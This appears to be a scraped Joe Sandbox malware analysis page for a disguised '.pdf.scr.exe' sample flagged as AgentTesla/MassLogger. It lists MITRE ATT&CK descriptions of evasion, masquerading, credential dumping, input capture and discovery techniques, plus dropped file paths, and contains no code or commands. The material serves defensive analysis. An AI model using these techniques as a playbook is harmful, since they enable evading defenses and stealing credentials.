Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Drive: Drive Access, File: File Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order SMG 201906 20190816order.pdf.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Au3Check.exe

C:\Program Files (x86)\AutoIt3\Au3Info.exe

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Windows Analysis Report
Order SMG 201906 20190816order.pdf.scr.exe

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre